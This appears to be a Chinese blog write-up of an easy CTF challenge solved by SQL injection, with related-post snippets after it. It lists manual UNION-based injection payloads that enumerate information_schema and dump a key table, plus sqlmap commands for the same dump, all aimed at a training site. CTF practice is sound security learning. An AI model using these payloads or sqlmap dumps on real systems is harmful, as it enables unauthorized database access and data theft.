CTF 这个看起来有点简单
这个看起来有点简单分值:10
- 来源: 西普学院
- 难度:易
很明显。过年过节不送礼,送礼就送这个
格式:
解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1
解法:
1.手工注入
id=1'
id=1 and 1=1
id=1 and 1=2 判断是sql注入
id=1 order by 2 两个字节
id=1 union select 1,2 回显2
爆数据库:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,2
information_schema my_db
爆表:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,2
news thiskey
爆字段:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,3
id content k0y
爆内容:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
sqlmap解法:
列 数据库:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs
列表:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
列字段:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
这个跑不出来。直接用下面的可以,但是需要知道k0y。
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
得出结果,但是需要把1改为l,不知道为什么。
CTF 这个看起来有点简单相关推荐
- pytdx 获取板块指数_通达信券商版看板块指数简单方法
新浪通达信行情主站加在券商版上看板块指数简单可行 方法是添加主站 1 如图 附地址 HostName01=新浪通达信北京电信主站 IPAddress01=tel1m.client.finance.si ...
- 软件咨询——并不像看上去那样简单
软件咨询--并不像看上去那样简单 很多做过开发的都有过做咨询顾问的幻想--苦心钻研一门技术,然后成为这个领域的专家,穿梭于各种充满诱惑的华丽场所,给那些像热锅上的蚂蚁一样焦急的客户提出高明的建议,而客 ...
- 这个看起来有点简单!--实验吧
这个看起来有点简单! 手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞) 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的t ...
- [转载] python格式化字符串漏洞_从两道CTF实例看python格式化字符串漏洞
参考链接: Python str.format()中的漏洞 >>> name = 'Hu3sky' >>> s = Template('My name is $na ...
- CTF MISC图片隐写简单题学习思路总结(持续更新)
系列文章目录 第一篇文章: CTF Crypto简单题学习思路总结(持续更新) 文章目录 系列文章目录 前言 一.JPG类隐写 1.1 JPG文件末尾添加字符串 1.2 JPG文件中添加字符串 1.3 ...
- 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...
- access insert语句怎么写_擦亮自己的眼睛去看SQLServer之简单Insert
摘要:本来是打算先写SQLServer历史的,不过感觉写那部分内容比较难还需要多查些资料.于是调整了下顺序写下简单的Insert语句. 不过感觉写那部分内容比较难还需要多查些资料.于是调整了下顺序写下 ...
- ctf题目:看不见的flag_记一次江西省信息安全线下CTF比赛
废话开篇 上学期,我在机房看红黑树的代码,被我们网络安全的老师看到了,于是就被拉去报名了信息安全的比赛,你们可能会很迷惑,写红黑树的代码和信息安全比赛有什么关系,我也这样想的,这有什么关系.. 当时报 ...
- Pandas入门超详细教程,看了超简单
本文主要是对pandas新手入门详细介绍,通过本文你将系统性了解pandas为何会有数据分析界"瑞士军刀"的盛誉,下面请看内容如下: 01 关于pandas pandas,pyth ...
最新文章
- 我在大学毕业后学习Linux、python的一些经验
- 阿里云支撑马来西亚数字自由贸易区落地 帮助马来西亚中小企业参与全球贸易...
- CentOS系统双网卡路由设置
- php无限评论回复_php如何制作无限级评论功能?
- mysql+性能优化+命令_MySQL 性能优化及常用命令
- java阅读题_java 练习题
- 阿里程序员双11加班吃什么?
- kafka消息队列学习笔记
- 关于回复某个评论的功能小改进
- loss值多少才算收敛_库存究竟多少才算合理?
- Opencv图像数据结构剖析
- U9二开之UBF配置和档案开发
- 防火墙的原理、主要技术、部署及其优缺点
- Boson Netsim 思科路由器仿真 静态路由表、RIP、OSPF
- [转载]耗散结构理论与生住坏灭--开放.平衡.涨落.突变.
- 陈宏申:浅谈京东电商商品文案挖掘难点与优化实践
- Docker之操作系统Alpine
- mat-icon 翻转_案例研究-翻转网站以获取利润
- gm220s路由器怎么设置_二级路由器怎么设置_二级路由器设置图解教程-192路由网...
- 离线版百度地图瓦片下载html版
热门文章
- Memcache应用场景
- 回车 触发 提交事件
- apache+php+mysql+phpadmin 服务环境搭建
- 组播相对于单播和广播的优势
- div table 超出了_div包裹的table,table的宽度超出了的宽度,出现的滚动条的在windows下无法拖动...
- mysql datetime类型按天查询_mysql 时间相关sql , 按天、月、季度、年等条件进行查询...
- 部署到gcp_GCP 网络系统Andromeda --- 概述篇
- 【零散积累】 vim常用操作
- qtreewidget 获取根节点_详解去中心化信任根dRoT技术
- java jml_JML 入门